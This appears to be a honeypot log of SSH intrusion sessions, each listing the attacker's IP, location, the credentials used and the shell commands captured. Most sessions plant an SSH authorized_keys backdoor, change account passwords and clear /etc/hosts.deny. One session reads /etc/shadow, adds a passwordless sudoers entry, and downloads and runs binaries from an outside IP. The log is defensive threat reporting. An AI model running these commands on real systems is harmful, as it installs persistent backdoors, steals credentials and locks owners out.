$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "1\neCiWxK5OO0Xw\neCiWxK5OO0Xw"|passwd|bash
$ echo "1\neCiWxK5OO0Xw\neCiWxK5OO0Xw\n"|passwd
🎭 ghost_2 (143.202.209.23) β€” Ciudad del Este, Paraguay Β· 1 session Β· 20 cmds
2026-06-04 07:48 EDT Β· as nextcloud/nextcloud@123
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "nextcloud@123\nEuAqLgWXdWPf\nEuAqLgWXdWPf"|passwd|bash
$ Enter new UNIX password:
$ echo "nextcloud@123\nEuAqLgWXdWPf\nEuAqLgWXdWPf\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_20 (157.15.67.253) β€” Tulungagung, Indonesia Β· 3 sessions Β· 59 cmds
2026-05-29 18:08 EDT Β· as color/color123, info/info, root/Abc123456*
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "color123\nPD3IlrIyd3WY\nPD3IlrIyd3WY"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "color123\nPD3IlrIyd3WY\nPD3IlrIyd3WY\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:8zgTN2JWFpPo"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "info\nv1P35ijHMQ4G\nv1P35ijHMQ4G"|passwd|bash
$ echo "info\nv1P35ijHMQ4G\nv1P35ijHMQ4G\n"|passwd
🎭 cipher_crypto (5.29.135.63) β€” Tel Aviv, Israel Β· 1 session Β· 20 cmds
2026-06-04 07:39 EDT Β· as color/color123
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "color123\nGWQR1CUy2HWO\nGWQR1CUy2HWO"|passwd|bash
$ Enter new UNIX password:
$ echo "color123\nGWQR1CUy2HWO\nGWQR1CUy2HWO\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_35 (43.129.44.66) β€” Jakarta, Indonesia Β· 2 sessions Β· 40 cmds
2026-06-04 06:18 EDT Β· as nagios/nagios, ubuntu/P@ss1234
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "nagios\nSg4ib9wKNejV\nSg4ib9wKNejV"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "nagios\nSg4ib9wKNejV\nSg4ib9wKNejV\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "P@ss1234\n0xQTTO5n128n\n0xQTTO5n128n"|passwd|bash
$ echo "P@ss1234\n0xQTTO5n128n\n0xQTTO5n128n\n"|passwd
🎭 frost_root_2 (95.165.68.145) β€” Moscow, Russia Β· 3 sessions Β· 59 cmds
2026-05-25 12:13 EDT Β· as nagios/nagios, root/Qwertyuiop123, ubuntu/P@ss1234
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "P@ss1234\n7mqDrF2WGHZS\n7mqDrF2WGHZS"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "P@ss1234\n7mqDrF2WGHZS\n7mqDrF2WGHZS\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "nagios\nUnUGYOeylQrM\nUnUGYOeylQrM"|passwd|bash
$ echo "nagios\nUnUGYOeylQrM\nUnUGYOeylQrM\n"|passwd
$ echo "root:TDGzfpnlbyN8"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 specter_root_38 (45.64.74.51) β€” San Po Kong, Hong Kong Β· 2 sessions Β· 25 cmds
2026-06-04 06:16 EDT Β· as nagios/nagios, ubuntu/P@ss1234
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "P@ss1234\nXWRCjeb2hV8w\nXWRCjeb2hV8w"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo -e "nagios\n9zOEOAbz5tcJ\n9zOEOAbz5tcJ"|passwd|bash
$ echo "nagios\n9zOEOAbz5tcJ\n9zOEOAbz5tcJ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 jade_root_6 (121.225.55.142) β€” Nanjing, China Β· 1 session Β· 1 cmd
2026-06-04 06:36 EDT Β· as root/Strad123@#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a;id;cat /etc/shadow /etc/passwd;lscpu;echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers;chsh -s /bin/sh daemon;echo Password123 |passwd daemon --stdin;mkdir ~/.ssh;chattr -ia ~/.ssh/* ~/.ssh;wget http://103.56.149.224/cacti/ns1.jpg -O ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys;chmod 700 ~/ ~/.ssh;wget http://103.56.149.224/cacti/ns3.jpg -O /tmp/x;chmod +x /tmp/x;/tmp/x;mv /tmp/x /tmp/o;/tmp/o;rm -f /tmp/o;mkdir /sbin/.ssh;cp ~/.ssh/authorized_keys /sbin/.ssh;chown daemon.daemon /sbin/.ssh /sbin/.ssh/*;chmod 700 /sbin/.ssh;chmod 600 /sbin/.ssh/authorized_keys;wget http://103.56.149.224/cacti/oto -O /tmp/oto;chmod 755 /tmp/oto;/tmp/oto;curl http://103.56.149.224/cacti/oto -o /tmp/oto;chmod 755 /tmp/oto;/tmp/oto;rm -f /tmp/oto // password hash extraction
🎭 burger_root_26 (65.49.139.223) β€” Wenatchee, United States Β· 2 sessions Β· 18 cmds
2026-05-24 02:38 EDT Β· as admin/admin, root/guest
network mapping β†’ OS/kernel identification β†’ CPU profiling
$ /ip cloud print Γ—2
$ ifconfig Γ—2 // network mapping
$ uname -a Γ—2 // OS/kernel identification
$ cat /proc/cpuinfo Γ—2 // CPU profiling
$ ps | grep '[Mm]iner' Γ—2
$ ps -ef | grep '[Mm]iner' Γ—2
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/* Γ—2
$ locate D877F783D5D3EF8Cs Γ—2
$ echo Hi | cat -n Γ—2
🎭 ghost_root_50 (37.27.9.174) β€” Helsinki, Finland Β· 1 session Β· 20 cmds
2026-06-04 05:43 EDT Β· as webmaster/webmaster
network mapping β†’ OS/kernel identification β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "webmaster\njsoTBlPrpcOr\njsoTBlPrpcOr"|passwd|bash
$ Enter new UNIX password:
$ echo "webmaster\njsoTBlPrpcOr\njsoTBlPrpcOr\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 stroopwafel_root_2 (45.156.87.216) β€” Eygelshoven, Netherlands Β· 2 sessions Β· 2 cmds
2026-06-04 04:32 EDT Β· as admin/admin, erp/erp
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—2
🎭 shadow_root_32 (182.93.7.194) β€” Macao, Macao Β· 2 sessions Β· 39 cmds
2026-06-04 03:39 EDT Β· as bpadmin/bpadmin, root/hunter2
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "bpadmin\nqhL5GZ60EA1u\nqhL5GZ60EA1u"|passwd|bash
$ Enter new UNIX password:
$ echo "bpadmin\nqhL5GZ60EA1u\nqhL5GZ60EA1u\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:2o5ZZJKeHgZ7"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 phantom_root_34 (84.240.206.218) β€” Pavlodar, Kazakhstan Β· 1 session Β· 20 cmds
2026-06-04 03:32 EDT Β· as bpadmin/bpadmin
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "bpadmin\nE4jimZDG3VQj\nE4jimZDG3VQj"|passwd|bash
$ Enter new UNIX password:
$ echo "bpadmin\nE4jimZDG3VQj\nE4jimZDG3VQj\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 silk_3 (220.154.133.135) β€” Qingdao, China Β· 1 session Β· 20 cmds
2026-06-04 03:16 EDT Β· as deployer/deploy
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "deploy\nAct1Y2CzCpiq\nAct1Y2CzCpiq"|passwd|bash
$ Enter new UNIX password:
$ echo "deploy\nAct1Y2CzCpiq\nAct1Y2CzCpiq\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wok_root_8 (120.48.84.44) β€” Beijing, China Β· 1 session Β· 1 cmd
2026-06-04 03:14 EDT Β· as root/fjbdfdjkdsfs541544AA@@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 lantern_root_12 (120.48.147.111) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-06-04 02:43 EDT Β· as compras/compras
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "compras\noiv3jBcQXLbp\noiv3jBcQXLbp"|passwd|bash
$ Enter new UNIX password:
$ echo "compras\noiv3jBcQXLbp\noiv3jBcQXLbp\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 viking_root_2 (83.253.210.84) β€” Malmo, Sweden Β· 1 session Β· 9 cmds
2026-06-04 00:34 EDT Β· as root/12345
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ /ip cloud print
$ ifconfig // network mapping
$ uname -a // OS/kernel identification
$ cat /proc/cpuinfo // CPU profiling
$ ps | grep '[Mm]iner'
$ ps -ef | grep '[Mm]iner'
$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
$ locate D877F783D5D3EF8Cs
$ echo Hi | cat -n
🎭 shadow_root_33 (197.221.151.14) β€” Kampala, Uganda Β· 1 session Β· 4 cmds
2026-06-03 22:05 EDT Β· as root/1234
OS/kernel identification β†’ hostname discovery β†’ process termination
$ uname -a // OS/kernel identification
$ hostname // hostname discovery
$ uname -m&&pkill upnpsetup // process termination
$ sudo pkill upnpsetup // process termination
🎭 bear_2 (213.170.75.150) β€” St Petersburg, Russia Β· 1 session Β· 20 cmds
2026-06-03 18:24 EDT Β· as virt/123456
OS/kernel identification β†’ hostname discovery β†’ process termination
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nZ0H96U76leJD\nZ0H96U76leJD"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nZ0H96U76leJD\nZ0H96U76leJD\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
